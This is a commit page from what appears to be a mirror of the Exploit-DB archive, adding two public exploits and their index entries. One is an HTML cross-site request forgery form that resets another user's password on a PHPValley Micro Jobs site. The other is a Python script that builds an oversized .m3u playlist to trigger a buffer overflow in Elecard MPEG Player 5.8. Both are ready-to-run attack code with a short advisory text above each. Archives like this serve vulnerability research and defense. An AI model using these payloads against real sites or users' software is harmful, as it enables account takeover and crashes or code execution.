bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-10-21

Browse source 
2 new exploits
This commit is contained in:
Offensive Security 2015-10-21 05:03:41 +00:00
parent 6f9c84b590
commit 0d57239a9a
3 changed files with 52 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
files.csv
View file

@ -34773,3 +34773,5 @@ id,file,description,date,author,platform,type,port
38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router Cross Site Request Forgery Vulnerability",2013-04-25,"Jacob Holcomb",hardware,remote,0
38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple CSRF And Persistent XSS Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
38498,platforms/windows/dos/38498.py,"Elecard MPEG Player '.m3u' File Buffer Overflow Vulnerability",2013-04-27,metacom,windows,dos,0
38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script Spoofing Vulnerability",2013-04-27,"Jason Whelan",php,webapps,0

Can't render this file because it is too large.

17
platforms/php/webapps/38499.html Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/59536/info
PHPValley Micro Jobs Site Script is prone to a vulnerability that allows attackers to spoof another user.
Attackers can exploit this issue to spoof another user; other attacks are also possible.
PHPValley Micro Jobs Site Script 1.01 is vulnerable; other versions may also be affected.
<!-- be logged into your own account, edit info below: -->
<form method="post" action="http://webfiver.com/change_pass.php">
<input name="changepass" type="hidden" value="Update" />
Target Username: <input name="auser" type="text" />
Your Password: <input name="cpass" type="password" />
<input name="npass" type="hidden" value="jacked" />
<input name="npassc" type="hidden" value="jacked" />
<input type="submit" value="Jack" />
</form>

33
platforms/windows/dos/38498.py Executable file
View file

@ -0,0 +1,33 @@
source: http://www.securityfocus.com/bid/59534/info
Elecard MPEG Player is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Elecard MPEG Player 5.8 is vulnerable; other versions may also be affected.
#!/usr/bin/python
# Exploit Title:Elecard MPEG Player 5.8 Local PoC
# Download link :www.elecard.com/assets/files/distribs/mpeg-player/EMpgPlayer.zip
# Product: Vulnerable
# Elecard MPEG Player,Elecard AVC HD Player
# RST
# Date (found): 27.04.2013
# Date (publish): 27.04.2013
# Author: metacom
# version:5.8.121004
# Category: poc
# Tested on: windows 7 German
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
filename= "elecard.m3u"
buffer= "\x41" * 783
buffer+="\x42" * 4
buffer+="\x43" * 4
buffer+="\x44" * 25000
textfile = open(filename , 'w')
textfile.write(head+buffer)
textfile.close()